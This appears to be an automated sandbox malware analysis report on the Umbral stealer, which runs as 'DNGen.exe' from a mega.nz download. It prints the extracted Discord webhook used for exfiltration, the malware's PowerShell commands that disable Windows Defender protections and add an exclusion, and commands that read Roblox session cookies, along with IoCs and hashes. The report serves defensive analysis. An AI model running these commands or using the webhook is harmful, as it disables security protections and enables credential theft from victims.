umbral | hxxps://mega[.]nz/file/GsNFEZYJ#4018tew4gzM07blU9inSziSpqrs__b15N2wdgiKHZCY

Analysis

max time kernel
300s
max time network
286s
platform
windows10-2004_x64
resource
win10v2004-20230621-en
resource tags

arch:x64arch:x86image:win10v2004-20230621-enlocale:en-usos:windows10-2004-x64system
submitted
28-06-2023 09:37

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://mega.nz/file/GsNFEZYJ#4018tew4gzM07blU9inSziSpqrs__b15N2wdgiKHZCY

Score

10^/10

umbral spyware stealer

Malware Config

Extracted

Family

umbral

https://discord.com/api/webhooks/1114960943219220510/5HQkJAaQ8k16LLJDPfrNPOSWhB6mOuQyVoiVmSfQ92mfYSQoRiYi30V3oB1Cxv1kgZoS

Signatures

Detect Umbral payload 4 IoCs

resource	yara_rule
behavioral1/files/0x0004000000023012-283.dat	family_umbral
behavioral1/files/0x0004000000023012-306.dat	family_umbral
behavioral1/files/0x0004000000023012-307.dat	family_umbral
behavioral1/memory/1592-308-0x000002268BD10000-0x000002268BD4C000-memory.dmp	family_umbral

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral

Executes dropped EXE 1 IoCs

pid	Process
1592	DNGen.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
62	ip-api.com

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
1220	wmic.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133324186677901804"	chrome.exe

Suspicious behavior: EnumeratesProcesses 20 IoCs

pid	Process
4276	chrome.exe
4276	chrome.exe
4276	chrome.exe
4048	powershell.exe
4048	powershell.exe
4048	powershell.exe
2412	powershell.exe
2412	powershell.exe
2412	powershell.exe
4060	powershell.exe
4060	powershell.exe
4060	powershell.exe
2220	powershell.exe
2220	powershell.exe
2220	powershell.exe
4532	powershell.exe
4532	powershell.exe
4532	powershell.exe
876	chrome.exe
876	chrome.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs

pid	Process
4276	chrome.exe
4276	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	4276	chrome.exe
Token: SeCreatePagefilePrivilege	4276	chrome.exe
Token: SeShutdownPrivilege	4276	chrome.exe
Token: SeCreatePagefilePrivilege	4276	chrome.exe
Token: SeShutdownPrivilege	4276	chrome.exe
Token: SeCreatePagefilePrivilege	4276	chrome.exe
Token: SeShutdownPrivilege	4276	chrome.exe
Token: SeCreatePagefilePrivilege	4276	chrome.exe
Token: SeShutdownPrivilege	4276	chrome.exe
Token: SeCreatePagefilePrivilege	4276	chrome.exe
Token: SeShutdownPrivilege	4276	chrome.exe
Token: SeCreatePagefilePrivilege	4276	chrome.exe
Token: SeShutdownPrivilege	4276	chrome.exe
Token: SeCreatePagefilePrivilege	4276	chrome.exe
Token: SeShutdownPrivilege	4276	chrome.exe
Token: SeCreatePagefilePrivilege	4276	chrome.exe
Token: 33	3040	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	3040	AUDIODG.EXE
Token: SeShutdownPrivilege	4276	chrome.exe
Token: SeCreatePagefilePrivilege	4276	chrome.exe
Token: SeShutdownPrivilege	4276	chrome.exe
Token: SeCreatePagefilePrivilege	4276	chrome.exe
Token: SeShutdownPrivilege	4276	chrome.exe
Token: SeCreatePagefilePrivilege	4276	chrome.exe
Token: SeShutdownPrivilege	4276	chrome.exe
Token: SeCreatePagefilePrivilege	4276	chrome.exe
Token: SeShutdownPrivilege	4276	chrome.exe
Token: SeCreatePagefilePrivilege	4276	chrome.exe
Token: SeShutdownPrivilege	4276	chrome.exe
Token: SeCreatePagefilePrivilege	4276	chrome.exe
Token: SeShutdownPrivilege	4276	chrome.exe
Token: SeCreatePagefilePrivilege	4276	chrome.exe
Token: SeShutdownPrivilege	4276	chrome.exe
Token: SeCreatePagefilePrivilege	4276	chrome.exe
Token: SeShutdownPrivilege	4276	chrome.exe
Token: SeCreatePagefilePrivilege	4276	chrome.exe
Token: SeShutdownPrivilege	4276	chrome.exe
Token: SeCreatePagefilePrivilege	4276	chrome.exe
Token: SeShutdownPrivilege	4276	chrome.exe
Token: SeCreatePagefilePrivilege	4276	chrome.exe
Token: SeShutdownPrivilege	4276	chrome.exe
Token: SeCreatePagefilePrivilege	4276	chrome.exe
Token: SeShutdownPrivilege	4276	chrome.exe
Token: SeCreatePagefilePrivilege	4276	chrome.exe
Token: SeShutdownPrivilege	4276	chrome.exe
Token: SeCreatePagefilePrivilege	4276	chrome.exe
Token: SeDebugPrivilege	1592	DNGen.exe
Token: SeShutdownPrivilege	4276	chrome.exe
Token: SeCreatePagefilePrivilege	4276	chrome.exe
Token: SeDebugPrivilege	4048	powershell.exe
Token: SeDebugPrivilege	2412	powershell.exe
Token: SeShutdownPrivilege	4276	chrome.exe
Token: SeCreatePagefilePrivilege	4276	chrome.exe
Token: SeDebugPrivilege	4060	powershell.exe
Token: SeDebugPrivilege	2220	powershell.exe
Token: SeShutdownPrivilege	4276	chrome.exe
Token: SeCreatePagefilePrivilege	4276	chrome.exe
Token: SeIncreaseQuotaPrivilege	1580	wmic.exe
Token: SeSecurityPrivilege	1580	wmic.exe
Token: SeTakeOwnershipPrivilege	1580	wmic.exe
Token: SeLoadDriverPrivilege	1580	wmic.exe
Token: SeSystemProfilePrivilege	1580	wmic.exe
Token: SeSystemtimePrivilege	1580	wmic.exe
Token: SeProfSingleProcessPrivilege	1580	wmic.exe

Suspicious use of FindShellTrayWindow 34 IoCs

pid	Process
4276	chrome.exe
4276	chrome.exe
4276	chrome.exe
4276	chrome.exe
4276	chrome.exe
4276	chrome.exe
4276	chrome.exe
4276	chrome.exe
4276	chrome.exe
4276	chrome.exe
4276	chrome.exe
4276	chrome.exe
4276	chrome.exe
4276	chrome.exe
4276	chrome.exe
4276	chrome.exe
4276	chrome.exe
4276	chrome.exe
4276	chrome.exe
4276	chrome.exe
4276	chrome.exe
4276	chrome.exe
4276	chrome.exe
4276	chrome.exe
4276	chrome.exe
4276	chrome.exe
4276	chrome.exe
4276	chrome.exe
4276	chrome.exe
4276	chrome.exe
4276	chrome.exe
4276	chrome.exe
4276	chrome.exe
4276	chrome.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
4276	chrome.exe
4276	chrome.exe
4276	chrome.exe
4276	chrome.exe
4276	chrome.exe
4276	chrome.exe
4276	chrome.exe
4276	chrome.exe
4276	chrome.exe
4276	chrome.exe
4276	chrome.exe
4276	chrome.exe
4276	chrome.exe
4276	chrome.exe
4276	chrome.exe
4276	chrome.exe
4276	chrome.exe
4276	chrome.exe
4276	chrome.exe
4276	chrome.exe
4276	chrome.exe
4276	chrome.exe
4276	chrome.exe
4276	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4276 wrote to memory of 3028	4276	chrome.exe	85
PID 4276 wrote to memory of 3028	4276	chrome.exe	85
PID 4276 wrote to memory of 3916	4276	chrome.exe	86
PID 4276 wrote to memory of 3916	4276	chrome.exe	86
PID 4276 wrote to memory of 3916	4276	chrome.exe	86
PID 4276 wrote to memory of 3916	4276	chrome.exe	86
PID 4276 wrote to memory of 3916	4276	chrome.exe	86
PID 4276 wrote to memory of 3916	4276	chrome.exe	86
PID 4276 wrote to memory of 3916	4276	chrome.exe	86
PID 4276 wrote to memory of 3916	4276	chrome.exe	86
PID 4276 wrote to memory of 3916	4276	chrome.exe	86
PID 4276 wrote to memory of 3916	4276	chrome.exe	86
PID 4276 wrote to memory of 3916	4276	chrome.exe	86
PID 4276 wrote to memory of 3916	4276	chrome.exe	86
PID 4276 wrote to memory of 3916	4276	chrome.exe	86
PID 4276 wrote to memory of 3916	4276	chrome.exe	86
PID 4276 wrote to memory of 3916	4276	chrome.exe	86
PID 4276 wrote to memory of 3916	4276	chrome.exe	86
PID 4276 wrote to memory of 3916	4276	chrome.exe	86
PID 4276 wrote to memory of 3916	4276	chrome.exe	86
PID 4276 wrote to memory of 3916	4276	chrome.exe	86
PID 4276 wrote to memory of 3916	4276	chrome.exe	86
PID 4276 wrote to memory of 3916	4276	chrome.exe	86
PID 4276 wrote to memory of 3916	4276	chrome.exe	86
PID 4276 wrote to memory of 3916	4276	chrome.exe	86
PID 4276 wrote to memory of 3916	4276	chrome.exe	86
PID 4276 wrote to memory of 3916	4276	chrome.exe	86
PID 4276 wrote to memory of 3916	4276	chrome.exe	86
PID 4276 wrote to memory of 3916	4276	chrome.exe	86
PID 4276 wrote to memory of 3916	4276	chrome.exe	86
PID 4276 wrote to memory of 3916	4276	chrome.exe	86
PID 4276 wrote to memory of 3916	4276	chrome.exe	86
PID 4276 wrote to memory of 3916	4276	chrome.exe	86
PID 4276 wrote to memory of 3916	4276	chrome.exe	86
PID 4276 wrote to memory of 3916	4276	chrome.exe	86
PID 4276 wrote to memory of 3916	4276	chrome.exe	86
PID 4276 wrote to memory of 3916	4276	chrome.exe	86
PID 4276 wrote to memory of 3916	4276	chrome.exe	86
PID 4276 wrote to memory of 3916	4276	chrome.exe	86
PID 4276 wrote to memory of 3916	4276	chrome.exe	86
PID 4276 wrote to memory of 4080	4276	chrome.exe	87
PID 4276 wrote to memory of 4080	4276	chrome.exe	87
PID 4276 wrote to memory of 2400	4276	chrome.exe	88
PID 4276 wrote to memory of 2400	4276	chrome.exe	88
PID 4276 wrote to memory of 2400	4276	chrome.exe	88
PID 4276 wrote to memory of 2400	4276	chrome.exe	88
PID 4276 wrote to memory of 2400	4276	chrome.exe	88
PID 4276 wrote to memory of 2400	4276	chrome.exe	88
PID 4276 wrote to memory of 2400	4276	chrome.exe	88
PID 4276 wrote to memory of 2400	4276	chrome.exe	88
PID 4276 wrote to memory of 2400	4276	chrome.exe	88
PID 4276 wrote to memory of 2400	4276	chrome.exe	88
PID 4276 wrote to memory of 2400	4276	chrome.exe	88
PID 4276 wrote to memory of 2400	4276	chrome.exe	88
PID 4276 wrote to memory of 2400	4276	chrome.exe	88
PID 4276 wrote to memory of 2400	4276	chrome.exe	88
PID 4276 wrote to memory of 2400	4276	chrome.exe	88
PID 4276 wrote to memory of 2400	4276	chrome.exe	88
PID 4276 wrote to memory of 2400	4276	chrome.exe	88
PID 4276 wrote to memory of 2400	4276	chrome.exe	88
PID 4276 wrote to memory of 2400	4276	chrome.exe	88
PID 4276 wrote to memory of 2400	4276	chrome.exe	88
PID 4276 wrote to memory of 2400	4276	chrome.exe	88
PID 4276 wrote to memory of 2400	4276	chrome.exe	88

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" "--simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT'" https://mega.nz/file/GsNFEZYJ#4018tew4gzM07blU9inSziSpqrs__b15N2wdgiKHZCY
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4276
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa789b9758,0x7ffa789b9768,0x7ffa789b9778
  2⤵
  PID:3028
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1812 --field-trial-handle=1824,i,5101136015349119121,12800081496017202816,131072 /prefetch:2
  2⤵
  PID:3916
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2168 --field-trial-handle=1824,i,5101136015349119121,12800081496017202816,131072 /prefetch:8
  2⤵
  PID:4080
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2212 --field-trial-handle=1824,i,5101136015349119121,12800081496017202816,131072 /prefetch:8
  2⤵
  PID:2400
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3180 --field-trial-handle=1824,i,5101136015349119121,12800081496017202816,131072 /prefetch:1
  2⤵
  PID:5040
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3188 --field-trial-handle=1824,i,5101136015349119121,12800081496017202816,131072 /prefetch:1
  2⤵
  PID:4300
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4560 --field-trial-handle=1824,i,5101136015349119121,12800081496017202816,131072 /prefetch:8
  2⤵
  PID:3976
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4932 --field-trial-handle=1824,i,5101136015349119121,12800081496017202816,131072 /prefetch:8
  2⤵
  PID:2128
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5060 --field-trial-handle=1824,i,5101136015349119121,12800081496017202816,131072 /prefetch:8
  2⤵
  PID:4364
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5308 --field-trial-handle=1824,i,5101136015349119121,12800081496017202816,131072 /prefetch:8
  2⤵
  PID:4512
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5592 --field-trial-handle=1824,i,5101136015349119121,12800081496017202816,131072 /prefetch:8
  2⤵
  PID:4996
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4984 --field-trial-handle=1824,i,5101136015349119121,12800081496017202816,131072 /prefetch:8
  2⤵
  PID:4060
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4532 --field-trial-handle=1824,i,5101136015349119121,12800081496017202816,131072 /prefetch:8
  2⤵
  PID:2004
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5608 --field-trial-handle=1824,i,5101136015349119121,12800081496017202816,131072 /prefetch:8
  2⤵
  PID:2280
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5572 --field-trial-handle=1824,i,5101136015349119121,12800081496017202816,131072 /prefetch:8
  2⤵
  PID:1936
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5560 --field-trial-handle=1824,i,5101136015349119121,12800081496017202816,131072 /prefetch:8
  2⤵
  PID:4620
- C:\Users\Admin\Downloads\DNGen.exe
  "C:\Users\Admin\Downloads\DNGen.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:1592
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\DNGen.exe'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4048
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2412
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4060
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2220
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" os get Caption
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1580
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" computersystem get totalphysicalmemory
    3⤵
    PID:3948
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    PID:5116
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:4532
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic" path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:1220
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4632 --field-trial-handle=1824,i,5101136015349119121,12800081496017202816,131072 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:876

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:3148

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x4e4 0x514
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3040

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
72B

MD5
7ded0e9b6a851ddb277c96b5ffdac548

SHA1
0c8c3061f319059e36d67304c8467c13847e072d

SHA256
76204c998d0ba08031ae378ce30b0d6954113987f0feca75b892c9885b016d81

SHA512
85958bd7c66ea875413142813f6e087a74ef6a8f0af38b19a9a32ed662cb5b7a3bea98463b4ef4e5717b530c5f3959e7a03871110b62de7196d19f94e6548c7d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\File System\000\t\Paths\MANIFEST-000001

Filesize
41B

MD5
5af87dfd673ba2115e2fcf5cfdb727ab

SHA1
d5b5bbf396dc291274584ef71f444f420b6056f1

SHA256
f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

SHA512
de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log

Filesize
209B

MD5
8d77147e41a3bdd65d2c83f65e13dab4

SHA1
86105a1bcd28d79d979e33eb8b71ca98471331d7

SHA256
f05a1281bbe5ba53e8edd5c5fb746fb1cfca130c67e15e2e14db1668e51dacb8

SHA512
3d80a633a6c96f108a12ec70fffc1ea3b4732310956ad68c11ccd7339e1596c6cb997cb832e2348e75477d75070eec4819473cdaef36fc7bff47b2a8e4556ea4

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
1KB

MD5
6e57b128ddf795950d66d35a60843948

SHA1
2c63802b77f9236bb76efdd9d2123c5e6544200b

SHA256
d4bfd26a059c195fb123c08d4b4aa91548d04afd5ed6beb88edd3b25b2aa929b

SHA512
35ecccc975d0d44e12af25b16884ef860cc2c860aec12c3b69cb2d8641b9afb5173761132eb27433e27b384162c9eaf60e2a3de92838f1ae843d8a6dab8e86f1

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
538B

MD5
114429847aa75fa0f6f2e0b3cb87150e

SHA1
7b972045b6807c59b316554d2b6b3a180350c36d

SHA256
48e9e10fac730caf81c283b7c1c49a9b820d8e9c0346a02b6655bd3f36ba83a1

SHA512
666b3fad8d46145c6a5af0debfa6e49e4c16b48485fbb1f6cd9055b8b0a5ab48bceaf03560bdbe61e00b7cb85ce72dceaabb291c0d3aba25a302cb538b9b2d1e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
84a576b42fb58856cd1c290a1cd4900d

SHA1
de167b33c5f8d9e974891519c88e90a4efa700b2

SHA256
16fa0b1c7adcb00f17666e4ca9f0b834afc50bcf28a7e31935b288f4b7c711da

SHA512
b49fa39cb1c91d59a8737c7b6360650024e9528cbff75f65506f811933966118d0ebac524f4ca61869b2f513bff215d8b7ad97ca273c7d986d05e5b72ec9a723

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
65f878683c041eb2c7ea055994876daa

SHA1
cd5ce78cb3a74b1f022d9d86edf65546a8a05d37

SHA256
0e7f840abbca6eb58f727c589c15a0adaa5bad1ff91b84c2589ac53e5f4126b4

SHA512
fbdcc2b2e0807e4fc26638662d00eba70fb6fab5f93a1ae2b1c50765474056492d76b8215b66f144a4ac4e74d68c526c82affbd8a166f8f442c5da6606e6b4b1

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
15KB

MD5
9970f7bff2ba748a354c89625cd9aad7

SHA1
80f5a94861ed91be38848301dc4bef9b742df17d

SHA256
577fc9975996c7140e237db008c083dccdcbad0449ebdacf4ae4691a7af44759

SHA512
079a6e59bae257f6456ba2ef566f70518ca57757bb61d088335e6a8a4f786e14a914e3ed5231a9961d43801b32ad5043e03e32464d8e708ac8ee7166fe95f50a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\Database\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

Filesize
72B

MD5
80ec47da06f279c7ba290ab2220cab93

SHA1
908e4d289b15d34604ed4a085e23e17e6ae4230d

SHA256
fb2b4b8189b04174d0305993b614de3c1b2f98e6f24db403f17c0ab621dd0760

SHA512
4721cd6f9cc4752cb1256c959de36c8baa6548e59c8add91ad8b3db5f2173ff3ba8368dcec734454ee1b8bbdd5c54eeb14472c177f2fc1885c4ec1c2938774d8

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe56f457.TMP

Filesize
48B

MD5
c3238e18565d2154181f4fb00d7bcf88

SHA1
d3118fdc5d7efcc8e3becf0a4e1ad387b2c21ac9

SHA256
c82b55a67437d62e658091c74f6f2d6925c79e3558e0e7296bfd47e691d96ed9

SHA512
107750e64a056974943dd4fd673ae3a338925e310037b955bffe164e20d5a8f640ae5660176ada125fa85ce76dc04df537048462bb5d129db4bc591ed966f3b0

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000003.log

Filesize
6KB

MD5
03d7fed85c56d2ac10fc07103d432fb3

SHA1
9d95aba8ffd37cf5265e253436a3235ebaf09ee5

SHA256
1abca6407db78bcfee32d608105094f2e3f5572d26b7b6389e630d86bb447d39

SHA512
609945cefc5552c3047e36c96e119d6b7df06a0533e1a68c488563b4da80ab581432b6e9faac550e46e596a025b3d81159e9098583621a43b39f53f9abb37462

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
174KB

MD5
d59c6a2a47630b520b937c7090f079a1

SHA1
51bac516949dff2a05715115039a0b6b2249770c

SHA256
aad5a78dbf6c7b93117713f256334ef736a15ee37ab5e2e7b943a91fb7af077f

SHA512
293d9710c1e3cf62b6e23b3fd67ac106a9c390e3c35c62dd7fa427497131b234e58bf262d25ccc6c3c489e93e3f86812dd70940b7525946913f2021e6613b7b0

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
174KB

MD5
d59c6a2a47630b520b937c7090f079a1

SHA1
51bac516949dff2a05715115039a0b6b2249770c

SHA256
aad5a78dbf6c7b93117713f256334ef736a15ee37ab5e2e7b943a91fb7af077f

SHA512
293d9710c1e3cf62b6e23b3fd67ac106a9c390e3c35c62dd7fa427497131b234e58bf262d25ccc6c3c489e93e3f86812dd70940b7525946913f2021e6613b7b0

Download Submit
